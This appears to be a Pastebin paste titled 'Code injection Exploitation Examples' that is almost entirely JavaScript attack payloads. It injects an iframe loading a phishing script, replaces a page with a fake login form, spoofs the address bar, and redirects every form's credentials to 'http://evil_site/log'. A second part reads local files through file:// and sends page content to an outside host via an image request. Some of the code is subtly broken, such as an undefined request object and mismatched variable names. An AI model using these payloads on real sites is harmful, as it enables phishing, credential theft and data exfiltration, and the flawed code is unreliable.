daily pastebin goal
20%
SHARE
TWEET

Code injection Exploitation Examples !

a guest May 17th, 2014 66 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. @Abdelmoughite Eljoaydi
  2.  
  3. /**
  4. <iframe src="http://evil_site/phishing.js"></iframe>
  5. *This payload injects an iframe tag that will load the script located at "/phishing.js”.
  6. *Let’s take a look at what phishing.js could contain:
  7. */
  8.  
  9. // Function to override the HTML content.
  10. function override(url) {
  11. var xhr_req = new XMLHttpRequest();
  12. xhr_req.open('GET', url, false);
  13. xhr_req.onreadystatechange = function () {
  14. if (xhr_req.readyState == 4 && xhr_req.responseText != "") {
  15. document.innerHTML = xhr_req.responseText;
  16. }
  17. }
  18. xhr_req.send(null);
  19. }
  20.  
  21. //Call override(url) function to override the current page with the content of "LoginForm.jsp".
  22. override("/console/login/LoginForm.jsp"); // we can extend this exploitation to CSRF attacks.
  23.  
  24. //Spoofing current URI (URL bar will look like /console/login/LoginForm.jsp).
  25. var stateObj = { log: "login" };
  26. history.pushState(stateObj, document.getElementsByTagName("title")[0].innerHTML, "/console/login/LoginForm.jsp");
  27.  
  28. //Hooking forms and submit victim credentials to "http://evil_site/log".
  29. var forms = document.getElementsByTagName("form");
  30. for (index = 0; index < forms.length; index++) {
  31. void(forms[index].action = "http://evil_site/log");
  32. }
  33. ==============================================================================================================================
  34. //Reading local files. (works only on Firefox)
  35.  
  36. function _LFileAccess(_method,action,argv){
  37.  
  38.     req.open(_method,action,false);
  39.     if(_method=="POST")
  40.     req.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
  41.     req.send(argv);
  42.     return req.responseText;
  43.     }
  44.     var local_file=_LFileAccess("GET","file://localhost/C:/PATH/",null);
  45.     dump(local_file);
  46.  
  47. //Screen-capture of the current page state.
  48.     XMlHttpReq.open("GET","example.com",false);
  49.     function getURL(s) {
  50.     var image = new Image();
  51.     image.style.width = 0;
  52.     image.style.height = 0;
  53.     image.src = s;
  54.     }
  55.     getURL("http://example.com/page.php?pagecopie="+xmlHttpReq.responseText);
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top